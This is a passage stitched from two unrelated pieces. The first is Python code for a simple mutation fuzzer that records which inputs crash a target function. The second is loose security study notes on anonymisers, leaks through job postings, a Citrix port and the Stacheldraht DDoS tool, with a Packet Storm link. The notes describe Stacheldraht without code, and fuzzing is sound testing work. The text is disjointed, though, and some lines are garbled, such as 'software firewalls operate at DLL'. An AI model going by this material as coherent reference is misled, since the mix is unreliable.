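    return fields


def mutate(seed, rng, min_len=5, max_len=15):
    """Apply 1-3 random insert/delete/replace edits, keeping the length within 5-15."""
    chars = list(seed)
    for _ in range(rng.randint(1, 3)):
        op = rng.choice(("insert", "delete", "replace"))
        if op == "insert" and len(chars) < max_len:
            chars.insert(rng.randint(0, len(chars)), rng.choice(ALPHABET))
        elif op == "delete" and len(chars) > min_len:
            del chars[rng.randrange(len(chars))]
        elif op == "replace" and chars:
            chars[rng.randrange(len(chars))] = rng.choice(ALPHABET)
    return "".join(chars)


def run_fuzz(target, seed, rounds=100, rng_seed=1):
    """Dumb fuzzing: feed mutated inputs to target and record which ones raise."""
    rng = random.Random(rng_seed)  # fixed seed so a run can be repeated exactly
    crashes = []
    for _ in range(rounds):
        candidate = mutate(seed, rng)
        try:
            target(candidate)
        except Exception as exc:  # any uncaught exception is a finding to triage
            crashes.append((candidate, type(exc).__name__))
    return {"rounds": rounds, "crashes": crashes,
            "unique_inputs": len({c for c, _ in crashes})}


def reproduce(target, candidate):
    """Re-run a single recorded input; returns the exception name or None."""
    try:
        target(candidate)
    except Exception as exc:
        return type(exc).__name__
    return None
```

A smart fuzzer, in the notes' terms, would replace `mutate` with edits that know the record grammar (for instance, only ever varying the value of `n`), reaching the same bug in far fewer rounds.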


    Anonymiser - can be used to get around blocked access.

    Information vulnerability - job postings & other postings exposing information about the technology.

    Citrix server's port 2598 is used to scan a network to find the Citrix machines.

    Stacheldraht

    The original DDoS tool "Stacheldraht" - a German word meaning 'barbed wire' - was released during the middle of 1999.

    Stacheldraht works on most Solaris and Linux systems. The original Stacheldraht, written by the hacker 'randomizer', was found to be running mostly on the Solaris platform because the Linux version is quite broken.

    Stacheldraht by itself is a malicious program that covers its tracks within a compromised system and communicates by covert channel and encryption on the network. The attacker could control hundreds or thousands of compromised systems via a single command line interface and launch different types of DDoS attack on the victim afterwards. It combines the features available from Trinoo and TFN and adds some new DDoS attacks.

    http://packetstormsecurity.com/distributed

    Common Vulnerabilities and Exposures (CVE) - submit the IDS logs for any new vulnerability.

    Software firewalls operate at DLL.
